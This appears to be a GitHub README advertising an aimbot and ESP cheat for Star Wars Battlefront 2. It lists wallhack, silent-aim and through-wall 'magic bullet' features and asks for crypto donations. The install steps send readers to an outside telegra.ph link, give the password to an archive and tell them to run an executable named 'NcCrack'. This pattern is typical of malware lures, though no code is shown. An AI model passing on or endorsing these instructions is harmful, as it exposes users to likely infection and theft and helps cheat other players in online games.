# Hack-Star-Wars-Battlefront-2-AimBot-Aim-ESP

# IMPORTANT 

# Be sure to create an account on GitHub before launching the cheat 
# Without it, the cheat will not be able to contact the server

-----------------------------------------------------------------------------------------------------------------------
# Download Cheat
|[Download](https://telegra.ph/Download-04-16-418)|Password: 2077|
|---|---|
-----------------------------------------------------------------------------------------------------------------------

# Support the author ( On chips )

- BTC - bc1q7kmj3pyhcm2n02z6p7gxvusqv55pt7vcgxe6ut

- ETH - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

- TRC-20 ( Usdt ) - TRYhDuV6qVcHQjfqEgF15w72TdxCMLDt9b

- BNB - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

-----------------------------------------------------------------------------------------------------------------------

# How to install?

- Visit our website

- Download the archive 

- Unzip the archive to your desktop ( Password from the archive is 2077 )

- Run the file ( NcCrack )

- Launch the game

- In-game INSERT button

-----------------------------------------------------------------------------------------------------------------------

# SYSTEM REQUIREMENTS

- Processor | Intel | Amd Processor |

- Windows support | 7 | 8 | 8.1 | 10 | 11 |

- Build support | ALL |

-----------------------------------------------------------------------------------------------------------------------

VISUAL

# SOLDIERS / PLAYERS

- Skeleton / Display skeletons
- Box / Display 2D squares
- Name / Display names
- Distance / Display distance
- Snapline / Display lines
- Health / Display health
- Change Distance / Change the display distance
- Bullet Drop Enable / Display a placemark where it is best to shoot
- Bullet Drop Speed Corrections / Manual Correction
- VEHICLS / EQUIPMENT
- Box / Display 2D squares
- Name / Display names
- Distance / Display distance
- Snapline / Display lines
- Health / Display health
- Change Distance / Change the display distance
- OTHER / OTHER
- FPS / Display FPS
- 2D Radar / Display 2D radar
- Crosshair / Display the crosshair
- Draw AIM ESP / Display the radius of the aimbot operation
- Draw Menu Button / Display the menu call button

# MEMHACKS

- No Recoil / Disable Recoil
- Silent Aim (works on an ongoing basis, only on visible opponents) / Turn on the aimbot without guidance (turned on constantly, works only on visible opponents)
- FOV / Change the radius of the aimbot
- Aim Bone / Change a part of the body to work as an aimbot
- Magic Bullet (works in the event that you started causing damage and the enemy was behind an obstacle) / Turn on magic bullets, allows you to damage the enemy through obstacles at a distance (works if you started causing damage and the enemy was behind an obstacle)
- Magic Distance / Change the working distance of magic bullets

# COLOR

- Weapon Hero / Change the color of the hero's weapon
- Saber Hero / Change the color of the hero's sword
- Soldiers / Change the color of the players

# SETTING

- Home / Menu
- Delete / Expand or collapse the game window
- End / Panic button (disables cheat)

![dmzPLr7](https://user-images.githubusercontent.com/34872331/225159318-efe9bcbe-91cd-4851-b08f-a7827499001f.jpg)
![GMp92c3](https://user-images.githubusercontent.com/34872331/225159322-9dcba4f1-ba1a-4198-9bcc-ded3dd76fc09.jpg)
![o5NiCxk](https://user-images.githubusercontent.com/34872331/225159325-a5c1a361-7b62-47cf-8dab-b53d26426ef1.jpg)
![QWreOpg](https://user-images.githubusercontent.com/34872331/225159326-9430787a-0bc8-4027-b972-556b671b4d16.jpg)
